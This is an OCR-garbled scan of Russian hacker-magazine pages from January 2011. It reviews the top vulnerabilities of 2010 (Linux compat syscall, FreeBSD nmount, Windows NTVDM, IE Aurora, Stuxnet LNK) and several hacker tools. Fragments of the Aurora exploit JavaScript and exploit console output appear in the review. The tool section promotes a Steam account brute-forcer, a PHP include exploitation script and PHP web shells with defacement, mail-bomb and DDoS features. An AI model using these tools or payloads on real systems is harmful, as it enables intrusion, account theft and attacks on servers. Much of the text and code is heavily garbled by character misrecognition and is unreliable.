рисовывание графа выполняемой программы в зависимости от 
входных параметров. Очень похожий проект имеет название КІ_ЕЕ 
( кІее.Цѵт.огд ). Но о нем в другой раз — это тема для отдельной 
статьи, нс 
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Выиграй 

РоскеШоок! 

Журнал Хакер и компания РоскеШоок представляют конкурс 
для книголюбов 




Нашелуникальный ресурсе кучей книг? Используешь крутой конвертер 
для преобразования между форматами?Знаешьтолкв модификации 
прошивокиулучшении изабііку? Присылай нам свои советы.трюки и 
хакидо Юянваря 2011 года на эоскеіЬоокйгеаІ.хакер.ги . Автор лучшей 
подборки советов по использованию Е-Іпкустройств получит отличный 
приз: электронную читал ку РоскеШоок 902. 




взлом 



Т0Р5 БАГОВ 
2010 ГОДА 

Самые значимые уязвимости прошедшего год: 

• Зтот год выдался по-настоящему жарким на уязвимости, столы 
опубликованных нульдеев - аж глаза разбегаются! Мне было довольно 
сложно выделить пять самых-самых, но я постарался справиться с этой 
нелегкой задачей. 



■ ■ Никита Тараканов, СІ55 РезеагсН Теат Нир:/ЛѵѵіИег.сот/І\ІТагакапоѵ 



5 место. Уязвимость в механизме 
эмуляции 32-битных системных вызо- 
вов в 64-битных версиях ядра Ппих 

Эта замечательная уязвимость берет свое начало в недалеком 
2007 году и описана в документе СѴЕ-2007-4573 ( ЬіІ.Іу/СѴЕ-2007- 
4573 ]. Обнаружил баг польский хакер под псевдонимом сІірЬ, он же 
ѴѴо і с і е с Ь Ригсгупзкі (интересно, как это произносится?). Уязвимость 
примечательна тем, что ей подвержены исключительно 64-битные 
версии ядра Ііпих, так как ошибка закралась в механизм совмести- 
мости 32-битных системных вызовов. Рассмотрим кусок кода (из 
агсЬ/х86_64/іа32/іа32епІгу.5), отвечающий за трансляцию 32-битных 
системных вызовов в 64-битные: 

зузепбег_с1о_са11 : 

стрі $ ( ІА32_ЫК_зузса11з-1 ) , %еах 

< проверка значения ЕАХ 

за іа32_Ьасізуз 

ІА32_АКС_РІХЦР 1 

саіі *іа32_зуз_са11_ЬаЫе ( , %гах, 8) 

< а здесь уже используется КАХ 

Как видно из листинга, сначала значение в регистре еах срав- 
нивается с длиной таблицы системных вызовов. Если значение 
попадает в нужный диапазон, вызывается макрос ІА32_АР6_ 
ЕІХІІР. Он используется для выравнивания аргументов 64-бит- 
ной платформы к регистрам 32-битной. Но если присмотреться 
повнимательнее к коду зузепІег_сІо_саІІ, видно, что для проверки 
сначала используется регистр еах, а для системного вызова уже 
гах! Тем самым, загружая в верхние 32 бита ненулевые значения, 



инструкция саіі передаст управление далеко за пределы систем 
ной таблицы! 

. шасго ІА32_АКС_РІХЦР поеЬр=0 
шоѵі %ес1і , %г8с1 

. іб ХпоеЪр 
. еізе 

шоѵі %еЪр,%г9с! 

. епсІіТ 

хсЬд %есх,%езі 

шоѵі %еЬх,%есІі 

шоѵі %есІх,%есІх 

/* 2 его ехбепзіоп */ 

. епсіт 

Запатчили данную уязвимость путем добавления нового макроса 
І_0А0_АР65: 

Х+ .шасго ЬОАВ_АКС832 о^бзеВ 

+ шоѵі ХоВВзеВ (%гзр) , %г11сЗ 

+ шоѵі ХоВВзеВ + З ( %гзр) , %г10с1 

+ шоѵі ХоВВзеВ + Іб ( %гзр) , %г9б. 

+ шоѵі \оТ:Езе1:+24 ( %гзр) , %г8сІ 

+ шоѵі ХоЕ^зеС+40 ( %гзр) , %есх 

+ шоѵі ХоВВзеВ+48 ( %гзр) , %ес!х 

+ шоѵі ХоВВзеВ+Бб ( %гзр) , %езі 

+ шоѵі \оТ:Езе1: + 64 ( %гзр) , %есІі 

+ шоѵі \оТ:Езе1: + 72 ( %гзр) , %еах < это затрет 

нулями верхние байты гах 
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ТЬапкз Ъо гесіЬаЪ Ьеіпд пісе епоидЬ Ьо Ъаскрогй іпЪо еагіу 
кегпеі ѵегзіопз (апуЬЫпд ^гоія 1а+ег АидизЪ 2008+) 



АсісіВІЪсЬЗе: моиісі Ііке Ьо зау Р*** той Вен Намкез. 
р1ап8 іпап. ОГизІ а Ьі^ Соо 13. 



^ои аг е а пе^> Ьеіго ! 



Той заѵесі ЬЪе 



Поздравления от блекхетов 



+ . епсЗш 

Однако в коммите за 24 апреля 2008 года самую главную строчку 
удалили, тем самым заново внедрив уязвимость :). 

шоѵі \о1:Е:зеЦ + 72 ( %гзр) , %еах 
. епсЗш 

В 2010 году известный хакер Веп Наѵѵкез, просматривая исход- 
ники ядра, к своему удивлению обнаружил отсутствие валидации 
регистра еах. Забавный эксплоит со встроенным трояном опубли- 
ковали блекхеты из некой андеграунд команды под названием 
АсІбВІІсЬЗх Они передали теплые слова поздравлений Веп 
Наѵѵкез'у ;]. 

сшрі $ (ІА32_ЫК_зузса11з-1) , %еах 
+ стрд $ (ІА32_ЫК_зузса11з-1) , %гах <-- 

теперь используется гах вместо еах 

4 место. Повышение привилегий в 
РгееВЗй: узвимость в птз тоипІО 

Эту уязвимость обнаружил греческий исследователь Раігокіоз 
Агдугоибіз, более известный какагдр. Ошибка кроется в функции 
п^тоипО до которой можно добраться с помощью системных 
вызовов тоипШ и птоипД), и связана с отсутствием проверки 
длины данных, которые пришли из пользовательского простран- 
ства. Кусок кода из зуз/п^зсііепі/п^ѵ^зорз.с ветки 8.0: 

* 1094 іі ( Шаз_йі_орЦ ) { 

* 1095 еггог = соруіп ( (сас!с1г_Ц) агдз . Ій, 

(сасісіг_Ц) пйі, 

< файловый хэндл под полным контролем атакующего 

* 1096 агдз . йізІ 2 е) ; < йізіге тоже 

* 1097 і! (еггог) { 

* 1098 доДо оиД; 

* 1099 } 

Для эксплуатации данной уязвимости атакующий должен иметь 
права для монтирования: за это отвечает опция ѵіь.изегтоипі 
(должна быть не нулевого значения). Простейший патч, добавляю- 
щий проверку для ДЛИНЫ: 

+ И (агдз . йізіге < 0 I I агдз.йтзіге > ЫР5Х_ 

ѴЗРНМАХ) { 

+ ѵ1з_шоипЦ_еггог (тр , "Вас! Іііе Ъ.апсИе" ); 

+ еггог = ЕІІМѴАЬ; 

+ доДо оиД; 

+ ) 

Релиз РгееВЗй 8.0 внес несколько улучшений в систему безопас- 
ности, одно из которых — защита от эксплуатации переполнения 
стека, более известная как сапа гу ѵѵогб. Во РгееВЗО это называется 
зІаск-зппазЫпд ргоіесбоп. Суть защитного механизма достаточно 
проста. До выхода из процедуры посредством инструкции геі вызы- 
вается код, который сравнивает значение сапагу ѵѵогсі на стеке с 




Повышение привилегий на РгееВЗР 7.2 



Раіаі Ігар 12: рауе Гаи И ыЬіІе іи кегпеі нагіе 
сриігі = Я; аріс ігі = Й0 


Гаи И ѵігіиаі агігігезз 


= 0ХС2925000 


Гаи 11 согіе 


= зирсгѵізог геагі. раде поі ргезепі 


іпзігисііоп роіпіег 


= 0x20 : 0хс0978а9Б 


зіаск роіпіег 


= 0x28 : 0хсгі0ЬЬ868 


Г гаме роіпіег 


= 0x28 :0хсгі0ЬЬѲЬ4 


согіе зедмепі 


= Ъазе 0x0, Іініі ЙхГГГГГ, Гуре 0х1Ь 
= БРЬ 0, ргез 1, гіеГ32 1, дгап 1 


ргосеззог еГІадз 


= іпіеггирі епаЫегі. гезиме, ІОРЬ = 0 


сиггепі ргосезз 


= 793 (моо) 


Ігар пимЬег 
рапіс: раде ГаиИ 
сриігі = Й 
Іірі імн : Зм 45 
РНузісаІ мемогу: 243 МВ 
йимріид 59 МВ: 44 28 12 
йимр сомріеіе 


= 12 


Йиіомаііс геЬоо! іп 15 


зесопгіз - ргезз а кеу оп (Ье сопзоіе Іо аЬогі 


— > Ргезз а кеу оп ІНе 


сопзоіе Іо геЬоо! . 


--> ог 5нНсІі оГГ ГЬе зузіем поы. 

1 



Паника ядра РгееВЗО 



актуальным значением. Если они не равны — значит, стек перепол- 
нился и происходит либо завершение процесса (гіпд 3), либо пани- 
ка ядра (гіпд 0). Из-за этого отличного механизма эксплуатировать 
данную уязвимость можно на 7-й ветке «фряхи», а на 8-й приходит- 
ся довольствоваться лишь йоЗ'ом :(. 

3 место. Повышение привилегий 
в ядре ѴѴіпсюѵѵз 

Эта уязвимость наделала много шума в январе! Я даже помню, что 
новость о ней проскакивала на таіі.ги с заголовком «Обнаружена 
уязвимость в ѴѴіпсІоѵѵз 1 7-летней давности!». Атаке подвержены 
все 32-битные системы ѴѴіпсІоѵѵз, начиная от ЫТ 4.0 и заканчи- 
вая «семеркой»! Ошибка заложена в специальном костыле ядра 
ѴѴіпсІоѵѵз для поддержки старых 16-битных приложений — эта 
подсистема называется ІМТѴОМ (ІЧТѴігІиаІ йОЗ Мобе). Обнаружил 
и опубликовал эксплоит небезызвестный хакер Таѵіз Огтапбу из 
компании Ѳоодіе. Примечательно, что невозможность эксплуата- 
ции уязвимости лежала на нескольких предположениях/аксиомах. 
Перечислю их: 

1. Для установки ѴйМ контекста требуется ЗеТсЬРгіѵіІеде- 
привилегия. 

2. Код в пользовательском адресном пространстве (Піпд 3 код) не 
может устанавливать произвольные значения в регистр селектора 
сегмента кода. 

3. Код в пользовательском адресном пространстве не может сфор- 
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Шпйоиз ЫТ/ 2 К/ХР/ 2 КЗ/и ІЗТА/ 2 К 8/7 ИИМпСоп^го К >->КіТгарШсІ Іосаі гіпдО ехріоіі 
ІаоізоРзсІІ , Іопезііаг . оі*д 



[ + ] Зраипіпд а §Ье11 Ьо діѵе 8ѴЗТЕМ Іокеп Ссіо поі сіозе іі) 

[?] Сгеа^еРгосез5< ,, С:\ШЫ00иЗ\8ѴЗІЕМ32\СМІ)-ЕХЕ ,, > => 182Ш 
С?) Се^УегвіопЕхО => 5.1 

С? ] Ыъфие гу8 уз 1ет1п1оі ѣ та1: іо п О => МЛ МОО08\зузѣеггі32\п1кгп1ра.ехе(?804В7000 
Е? ] ЗеагсЬіпд Рог кегпеі 5.1 зідпаіиге < 64, аі, ... > ... 

[+] Зідпаіиге Роипй 0x29152 Ъуіез Г гоп кегпеі ѣазе 
[ + ] Зіагііпд Іке НТУОМ зиЬзузІеп Ъу Іаипскіпд М3 -008 ехесиІаЫе 
С?] Сгеа1еРгосезз< "СіМІІ Н00иЗ\8Ѵ8ІЕМ32\0ЕВи(з.ЕХЕ м > -> 2312 
С?] 0репРгоеезз<2312> => 0x34 

Е? ] Іп^есііпд іЬе ехріоіі ІІігеай іпіо НТУВИ зііЪзузІет 00x34 
[?] МгіСеРгосеззМегю і*у<0х34, 0x2070000, "МОНЕХРЬО! Т . ОЬЬ", 14>; 

Е? 3 УаііРогЗ іггдІеОЬоесІ <0x10, I НРІ N1 ТЕ> ; 

Е?3 СеіЕхііСойеТЬгеасК0хІ0, 0012РР44>; => Шх773Ш3074 
[ + 3 ТНе ехріоіі іЬгеай герогіз ехріоііаііоп иаз зиссеззРиІ 
[ + 3 У001* Уои сап пом изе Ніе зііеіі орепей еагііег 
[+3 Ргезз ап у кеу Ьо ехіі... 



Отладочная печать в эксплоите от Таѵіз'а 



мировать Ігар Ітате.И Таѵіз Огтапсіу с хакерской смекалкой обо- 
шел все эти предположения! 

Первое предположение. Для обхода хакер реализовал следую- 
щую комбинацию. Сперва посылается запрос ІЧТѴМО-подсистеме, 
затем в процессе сзгзз посредством стандартной АРІ-функции 
создается удаленный поток, который по умолчанию имеет данную 
привилегию. 

Второе предположение. Регистр СРІ_ (Сиггепі Ргіѵііеде І_еѵеІ) 
обычно равен двум младшим байтам сегментных регистров сз и 
55, однако есть исключение из этого правила, когда процессор 




находится в режиме ѴігІиаІ-8086. Реальный режим процессоров 



х86 юзает сегментную схему адресации памяти, чтобы, используя 
16 бит, иметь доступ к 20-битному адресному пространству. Это 
достигается путем нехитрой формулы: (сз << 4) + (еір & ОхІШ). 
Такая же формула применяется для проецирования сегментиро- 
ванного адресного пространства в защищенное линейное адрес- 



мягких по-прежнему предоставляет возможность получить доступ 
к освобожденной памяти до тех пор, пока она не занята! 
Эксплуатировать уязвимость получается из-за доступа к памяти 
згсЕІетепІ при помощи метода СЕѵепЮЬщѲепепсѲеіЕІетепІ из 



ное пространство в режиме ѴігІиаІ-8086. Это развязывает руки 
атакующему, ведь так можно выставлять сз в любое значение! 
Третье предположение. Возврат из режима ядра в пользо- 
вательский режим посредством инструкции ігеі — достаточно 
сложная операция. Стоит взглянуть на данную инструкцию в 
документации от Іпіеі — это 6 страниц микрокода, нагруженных 



библиотеки тзЫтЫН, которая, в свою очередь, пытается полу- 
чить доступ к удаленному объекту при помощи функции СЕІетепЕ: 
ОеШосРіг. 

В эксплоите это делается следующим кодом: 

ЕипсДіоп еѵІ(еѵЪ) 



ІЕ-конструкциями. Возврат состоит из двух частей: Рге-соттіі и 
Розі-сотппіі. Одна исполняется с ядерными значениями сегмент- 
ных селекторов, другая — со значением уже для гіпд 3. Используя 
контекст ѴйМ, атакующий может создать фейковый контекст с 
помощью недокументированной функции ЫіѴсІппСопІгоІ, что при- 
ведет к ошибке на рге-соттіі стадии и сформирует Ігар-Ітаппе. 



{ 

еѵепЪ_оЬз = йоситепЦ . сгеаЪеЕѵепЦОЬП есЪ ( еѵЪ ) ; 
сіоситепЪ . деЦЕІетепЪВуІсІ ( " зрі " ) . іппегНТМЬ = " 

міпсіоѵ\г. зеШпЪегѵаІ (еѵ2 , 1); 



2 место. Исполнение кода в Іпіегпе* 
Ехріогег: Операция Аигога 

Открывает список удаленных уязвимостей баг в ІЕ (СѴЕ-201 0- 
0249), который наиболее известен под названием «Операция 
Аигога». Публикация этой уязвимости реально насолила 
МісгозоНу, так как произошло это через несколько дней после 
выхода «вторника патчей» (самое неудачное время для М5). Суть 
уязвимости СѴЕ-201 0-0249 заключается в неправильной обра- 
ботке памяти в тзЫтЫЕ. Если точнее, в библиотеке остается 
«подвешенной» ссылка на объект — типичнейший представитель 
бреши «изе-аііег-ітее». Атакующий, используя ^ѵаЗсгірІ, может 
получить доступ к этому участку памяти следующим образом: 

• При помощи вызова сІосшпепССгеаІеЕѵепЮЬіесШ осуществля- 
ется доступ к уязвимому объекту; 

• После этого вызывается сІоситепІ.деіЕІетепіВуІбО, чтобы убить 
в памяти бажный объект, при этом движок ЭаѵаЗсгірОа от мелко- 



ЕипсЦіоп еѵ2 ( ) 

{ 

ѵаг сІаДа, Ъшр; 
сІаЪа = " " ; 

Ъшр = ипезсаре ( " %и0а0а%и0а0а" ) ; 

Іот (ѵаг і = 0 ; і < 4 ; і + +) 
сІаЪа += Ъшр; 

±от (і = 0 ; і < оЬз . ІепдЫл ; і++) 

{ 

оЪз [і] .сІаДа = сІаЪа; 

} 

еѵепЪ_окд . згсЕІешепР ; 

} 
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СРЦ_РіпсІСРип*о 







СРІ._І.оасІАпсІРіпсІАррІе1 



СРЫ-оасІСРІМосІиІе 



1 



05А ОеШетРІг 






Ысоп 



4 Эа+а Ассезз 

і СопІгоІ РІОѴѴ 



Соруісоп 



ІоасІСРШосІиІе 



Т 



ЬоасіиЬгагуѴѴ 







ЬМосІиІе 


Ж 

1 

1 

1 

1 

1 




1 


ІоасІІтаде 





ІпЖаІігеСопІгоІ 






ІпЖаІігеСРШосІиІе 



05А_Іп$еіИІет 



Граф Сопігоі Лоѵѵ: от начальной точки обработки данных до ІюасШЬгагуѴѴ 



<Ъосіу> 

<зрап Іс1="зр1"> 

<ішд згс= " ашгога . ді:Е» оп1оас!= " еѵі (еѵепЦ ) " > 

< Триггер уязвимости 

</зрап> 

</Ъос1у> 

К сожалению, публично доступный эксплоит не обходит ни О ЕР, 
ни уж тем более А5І_Р, хотя от коллег из антивирусных компаний 
я слышал, что в природе существуют более продвинутые сплои- 
ты. Первой почувствовала на себе мощь эксплоита компания 
боодіе: по словам представителей компании, 12 января была 
атакована система Отаіі. Атака велась предположительно из 
Китая — прям третья мировая в киберпространстве! :) Впрочем, 
многие исследователи считают, что это вовсе не попытка про- 
мышленного шпионажа, а лишь простая деятельность блекхе- 
тов, и боодіе просто случайно попала под раздачу. 

1 место. Уязвимость в обработке 
ярлыков или «Іпк-апокалипсис» 

На мой взгляд, это не уязвимость — это бомба, и она, бесспор- 
но, заслуживает первой строчки в Іор 5! Брешь была обнаруже- 
на в составе нашумевшего червя Зіихпеі, использующего ее для 
заражения системы через ІІ5В-накопители. Спустя некоторое 
время в МеІаЗрІоіІ'е появилась версия эксплоита для удаленно- 
го вектора, использующая ѴѴеЬйАѴ протокол. 

Интересно проследить хронологию событий: 

• 17 июня. Антивирусные аналитики из белорусской компании 
ѴігизВІокАсІа обнаружили две очень интересных «малвари», 
которые заражали полностью пропатченную ѴѴіпсІоѵѵз 7, если 
пользователь просмотрит содержимое ІІ5В-носителя с помощью 
стандартного проводника (ѴѴіпсІоѵѵз Ехріогег). 



• 17 июля. Місгозоіі признала наличие уязвимости и выпустила 
соответствующую абѵізогу. 

Мне удалось узнать (по своим приватным каналам ;)), что 
Місгозоіі реально игнорировала репорты от ѴігизВІокАсІа до тех 
пор, пока компания не разослала информацию другим антиви- 
русным вендорам. Тогда уже монстры антивирусной индустрии 
нажали на мелко-мягких, и те наконец-то зачесались :). 
Уязвимость не относится к уже приевшимся зіаск/беар оѵегііоѵѵ 
и т.д. — это потрясающая архитектурная недоделка, заложенная 
агентами АНБ или кривыми руками программиста :). Ошибка 
кроется в процессе отображения ярлыков Сопігоі Рапеі, когда 
происходит их загрузка в память процессом Ехріогег.ехе. 
Уязвимой является библиотека зЬе1132.сІІІ, в которой происходит 
некорректная обработка, что приводит к контролю параметра 
(путь к загружаемой библиотеке) функции БоабЫЬгагуѴѴ. Так как 
это прямая загрузка зловредного кода в адресное пространство, 
то все защитные механизмы (БЕР/А5БР/5ЕН0Р) идут лесом! 

Что нас ждёт в 2011-м? 

То, насколько разнообразны и интересны были уязвимости 
в 2010 году, действительно впечатляет. Благодаря червю 
Зіихпеі впервые серьезно заговорили о целевой атаке против 
ЗСАБА-систем, а распространение Аигога назвали не просто 
набившим оскомину словом «эпидемия», а почти по-военному 
— операцией :). Вообще, малварь в этом году подарила (если, 
конечно, так можно сказать) вкуснейшую подборку Обау уяз- 
вимостей. 

Вот даже сейчас, когда я пишу эти строки, в паблике появился 
эксплоит для повышения привилегий в ѴѴіпсІоѵѵз Ѵізіа, 2008, 7, и 
он опять же был использован в Біихпеі! Впечатляет работа ком- 
митеров и аудиторов кода. А, значит, и нас с тобой, □с 
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Программа: 5+еат'О Вшіе 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: ІЫ5ЮЕК 
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Брутим акки стима 



Первой в нашем сегодняшнем обзоре выступа- 
етпрограмма, предназначенная для восста- 
новления забытого пароля к зіеат -аккаунту. 
Функционал проги достаточно стандартен: 

• поддержка прокси (ЫЩр, зоскз 4/5); 

• многопоточность; 

• встроенный чекер аккаунтов ; 

• автоматическое сохранение дооб'ов; 

• автоматическое сохранение еггог'ов 
(брут аккаунтов, попавших на ошибки со- 
единения) . 

Начать работать с брутфорсом достаточно 
просто: 

1 . Указываем в соответствующих полях 
нужные М-файлы (первый со списком вида 
Іодіщразз для проверки, второй — ргоху:роіі:); 

2. Указываем тип прокси; 

3. Указываемтаймаут соединения и нажима- 
ем «5ТАПТ». 

Из особенностей брута можно отметить то, что 
на сайте стима без капчи можно ввести невер- 
ный парольтолько два раза, следовательно, 
тебе понадобится очень много проксиков. 

Программа: МікзТига 
ОС: *піх/\л/іп 
Автор: йгТРО 

А сейчас хочу тебе представить замечатель- 
ный скрипт для работы с рбр-инклудами. 
Функционал скрипта: 

• при наличии ошибок скрипт автоматически 
подбирает путь к корневой директории; 




Исследуем инклуды 

• проверка возможности удаленного инк- 
луда, работа с враппером баба: , рЪр: / / 
іприб ; 

• если есть возможность использования 
враппера баба : или рЬр: //іприб, скрипт 
предоставляет интерактивную консоль 
доступа к шеллу; 

• проверка необходимости использова- 
ния нулл-байта или слешей для обрезания 
расширения; 

• если нет вывода ошибок и, соответс- 
твенно, нет возможности найти биіі рабй, 
скрипт использует брутфорс пути (до 15 

• распознавание ОСи и типа сервера по 
хедерам (при выводе ошибок) ; 

• работа с НТТР-прокси при нали- 
чии установленного регі -модуля 
ШР : : Ргобосоі : : зоскз . 

В будущих версияхутилиты автор планирует 
добавить работу слогическим подбором 
логов и конфигов в зависимости от версии 
сервера и типа ОСи. Также автор будет рад 
увидетьлюбыетвои вопросы и пожелания 
по работе скрипта в топике бирУЛогит. 
іпаиаск.ги/МікзІига-Міпі-иіШіа-Руа-ВаЬоІу- 
5-1пкІисІаті-і2383СШіті[ . 

Программа: ІТЗесТеат ЗИеІІ ѵ2.1 
ОС: *піх/ѵѵіп 

Автор: Атіп 5НокоЫ(Ре|ѵак) 

Давненько в нашей рубрике не появлялись но- 
вые рбр-шеллы. Настало время исправить это 
недоразумение :). Итак, представляютвоему 
вниманию настоящий хакерский шелл-ком- 
байн под названием ІТЗесТеат 5ЬеІІѵ2.1 ! 
Вотлишь некоторые возможности и особен- 
ности да н н о го с кр и пта : 

• малый вес для таких возможностей (66 Кб) ; 

• выполнение системных команд; 

• обход ограничений на выполнение ко- 
манд; 

• обход ограничений на просмотр дирек- 
торий; 

• коннект к базам данных МуЗОЬ, МЗЗОЬ, 
РозбдгеЗОЬ, Огасіе & ІВМ БВ2; 



йоху: 





Хакерский комбайн 

• редактирование файлов и директорий; 

• информация о сервере , версии РНР и на- 
личии забе тобе; 

• листинг системных дисков в Міпбомз ; 

• возможность добавления иконок к файлам 
и папкам; 

• открытие файлов с помощью прямого 
линка; 

• скачивание всех файлов и папок в вы- 
бранной директории в формате гір без ис- 
пользования специализированных функций; 

• прямое скачивание файла; 

• добавление симлинка двумя разными пу- 
тями (команда ОС или с помощью рЪр) ; 

• преобразование строки в различные 
форматы; 

• мейл-бомбер; 

• локальный БоЗ ; 

• дамп базы данных в зді /дгір- форматы; 

• встроенная утилита для масс-дефейса 
всех папок с правами на запись; 

• скачивание файлов с другого сервера; 

• возможность организации удаленных 
ББоЗ-атак; 

• поиск всех папок с правами на запись; 

• обход зугпііпк и шоб_з есиг і бу ограниче- 
ний с помощью .кбассезз; 

• автоудаление шелла; 

• копирование файлов без использования 
функций копирования рЪр; 

• изменение шаблона шелла; 

• отключение тадіс_диобез ; 

• список последних событий. 

Как видишь, с помощью одного этого скрипта 
ты сможешь сделать со своим сервером прак- 
тически все, что пожелаешь :). Подробности и 
новые версии ищи по адресу ЬирУ/іІзесІеат. 
сот/епЛооІз/ІІзесІеат зЬеІШт . 

Программа: ІСОиіпѴаІиег 
ОС: ѴѴЫоѵѵз 2000/ХР/2003 
5егѵег/ѴізІа/2008 $егѵег/7 
Автор: йапк & йеЛЛегк & 
ЫідЫЕадІе 

На очереди классная программа от юзеров 
Асечки. На этот раз прогеры с радостью готовы 
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Грамотно оцениваем ІСО-номера 

отдать втвое пользование крайне полезную 
утилиту для оценки стоимости ІСО-номеров 
по их маске и статусу. В список возможностей 
оценщика входят все необходимые для ІСО- 
селлера фичи: 

• оценка номера по статусу (ѵіз/ 
іпѵі 2 ) и по маске; 

• редактор масок (одинаковые цифры, 
цифры, идущие подряд, лесенки, зер- 
кала, бинарные, сотки и т.д. ) ; 

• редактирование начальной стоимос- 
ти номеров ; 

• изменение бонусов по маскам; 

• изменение действий по маскам; 

• возможность установки значений по 
умолчанию ; 

• сохранение и загрузка значений при 
запуске и закрытии программы; 

• оценка номеров по списку. 

Уже сейчас данная утилита успешно исполь- 
зуется многими продавцами номеров, такчто 
советую и тебе присоединиться к ним :]. 
Любые багрепорты и вопросы по работе 
программы направляй в тему на Асечке — 
іЪгит.а5есЬка.ги/5Ьо\лгіЬгеас1.рЬр?{=1 1 8542 . 

Программа: Еазіегеддег 
ОС: ѴѴіпаоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: Савчук Евгений 
Александрович 

Известно, что у каждого человека есть свои 
секреты — это знают все. Вот и у каждой про- 
граммы есть свои секреты. Еазіеддег здесь 
не исключение :). Эта программа содержит 
базу данных с описаниями пасхальных яиц 
(скрытых возможностей в программах), 
которые разработчики часто скрывают в 
своихтворениях. В ней имеются секреты к 
большому числу программ, операционных 
систем, игр, мобильныхтелефонов, карман- 
ных компьютеров, и с каждой новой версией 
этотсписок расширяется. База обновляется 
ежемесячно. 

Пользоваться данной программой интуитив- 
но просто: 

1 . Выбирай категорию («Программы», «Опе- 
рационные системы», «Мобильныетелефо- 
ны» и другие); 

2. После выбора категории появляется спи- 
сок, выбирай из списка то, что тебя интересу- 
ет, и читай описание. 

Например, открывай раздел «Программы -> 
рТоггепІ». Появится следующее описание: 




Откройте программу . 

Зайдите в НеІр-АЬоиб цТоггепб 
(Помощь о цТоггепб) . 

Кликните на лого цбоггепб и услыши- 
те звук. 

Там же нажмите клавишу Т — можно 
сыграть в тетрис (цТгіз) . 

Если нажать во время игры клавишу 
Р, то игра приостановится. 

Также автор сообщает, что ты сможешь по- 
искать па ехал ки и в самом Еазіеддег'е, так 
какони появляются в каждой новой версии 
:). Все обновления и подробную справку 
ты сможешь найти на официальном сайте 
программы ЬЛрѴ/еазІюддег.сопп . 

Программа: РѴѴСеп 
ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$+а/2008 5егѵег/7 
Автор: СЬгізІіап ТЬоеіпд 

Одним из самых главных факторов обес- 
печения компьютерной безопасности на 
сегодняшний день является надежность 
пользовательского пароля. Обеспечить 
такую надежность тебе поможет программа 
РѴѴОеп, разработанная специально для 
генерации паролей позаданным парамет- 
рам. Возможности и особенности генера- 
тора: 

• Ргее и Ореп-Зоигсе; 

• использование криптографических 
методов АЕЗ и ЗНА-2; 

• легкость в использовании и уста- 
новке (не устанавливаются никакие 
дополнительные БЫРки, ничего не 
пишется в реестр Міпбочлз) ; 

• безопасное управление памятью 
(при завершении работы программы 
память, занимаемая ей, забивается 
бинарными нулями) ; 

• поддержка множества языков ; 

• генерация паролей с помощью ворд- 
листов ; 

• использование рандомной энтро- 
пии; 

• крипт текста и файлов . 

Скачать паки для различных языков, а 
также исходники и другие дополнитель- 
ные файлы ты сможешь на официальной 
страничке программы — ЬирѴ/рѵѵдеп-ѵѵіп. 
зоигсеЬгде.пеЕ Также существует и *піх- 
версия генератора, найти которую ты смо- 
жешь по адресу ЬирѴ/рѵѵдеп.зоигсеЬгде. 
пеі . 




Генерируем правильные пароли 




Модификация ѴУ/ЗО-шелла 

Программа: ѴѴ50 КгізЦАІІесІЖоп 
ОС: *піх/\л/іп 
Автор: Кгі$Т_АІ1 

Последней в нашем сегодняшнем обзоре высту- 
пает интересная модификация известного шел- 
ла ѴѴ80. Автор модификации Кгіз1:_АІ_І_ решил 
добавить в шелл большой списокфункций и 
изменений, которыхему не хватало в оригинале: 

• удаленная загрузка с сервера (если 
нет боѵлііоабег 1 ов , то поле не показы- 
вается вообще, если же есть, то в спис- 
ке только те, которые присутствуют на 
сервере) ; 

• цвет надписей зависит от текущих 
прав (зеленый — ѵлгібаЫе, красный — 
нет прав) ; 

• теперь всегда перед глазами по- 
лезности, опасности и прочая нужная 
информация (нет необходимости лезть в 
раздел ШЕО) ; 

• поиск эксплойтов на множестве сай- 
тов; 

• в списке появилась возможность ре- 
дактирования файла (выбираем один- 
единственный файл и жмем кнопку) ; 

• порядок столбцов изменен на более 
удобный ; 

• дополнительная информация в разделе 
ШЕО; 

• каждый параметр с новой строчки; 

• автоматически подсвечивается рйр- 
код, если ты просматриваешь файл с 
расширением рйр ; 

• убран неработающий тіШОгт; 

• изменен дизайн; 

• добавлена переменная $Д 

(1 — показывает поле авторизации, 

2 — не показывает) ; 

• другие мелкие исправления и 
дополнения . 

Любые вопросы и пожелания по работе 
данной модификации направляй прямиком 
автору в топик — ЬирУ/ехрІоіІ.іпАоги т/іпсіех. 
рЬр?5боѵѵІоріс=40939 лг 



ХАКЕР 01 (144) 201 1 



► 075 




■ ■ Лозовский Александр Іоюѵзкугадатеіапсі.ги 





ВЫБИРАЕМ АНТИВИРУС 

ОПРЕДЕЛЯЕМ ЛУЧШИЙ АВЕР/ЖТЕРШ 5ЕСІІРІТѴ ПО ВЕРСИИ ЖУРНАЛА ХАКЕР 

Вдохновленные нашей новой (относительно) рубрикой «Маіѵѵаге» читатели активно спрашивают 
нашего совета. Практически ежедневно ко мне приходят письма, в которых читатели интересуются, 
какой антивирус я бы посоветовал в данной конкретной ситуации. 



Конечно, это лучше, чем письма прото, как получить аську Форба и 
гдетеперь найти Криса Касперски :). Чтобыты не мог насупрекнуть 
втом, что мы не выполняем твои желания, мы сделали эту статью. 

Я спросил мнение умных людей, знающих толк в информационной 
безопасности, вотони: шесть редакторов твоего любимого журнала 
и два настоящих профессионала антивирусного фронта —управля- 
ющий партнер ресурса апб-таіѵѵаге.ги . Илья Шабанов, и главный 
краш-лаборантжурнала Хакер — Оееопі$ — тот самый дяденька, ко- 
торый тестирует на прочность антивирусы и оттого является объектом 



постоянной критики со стороны вендоров :). 

Итак, три вопроса, которые мы задали всем этим людям: 

1. Антивирус, который вы используете дома. Почему? 

2 . Антивирус, который вы бы поставили подруге. То есть 
такой, чтобы подруга при этом не взрывала вам мозг постоян- 
ными звонками и вопросами касательно его деятельности. 

3 Антивирус, который вам по какой-либо причине показался 
интересным. Почему? 



% 



НИКИТА кислицин, 
ГЛАВНЫЙ РЕДАКТОР X 



1. Единственная вещь, для чего мне нужен 
антивирус — это для защиты оттупых 
файловых вирусов с ІІ8В-флешек гостей. 
Поэтому я использую М і егозой Бесигііу 
Еззепііаіз: он отлично справляется с этой 
задачей, плюс вообще не паритмозг, не 
тормозит компьютер и является бесплат- 
ным, что я воспринимаю как кармическое 
преимущество. 

Вообще же необходимость в антивирусах 
очень раздута самими вендорами: самая 
эффективная защита — это не ходить по 
говносайтам, пользоваться нормальным 
браузером, вовремя его обновлять вместе 
со всеми плагинами и использовать совре- 
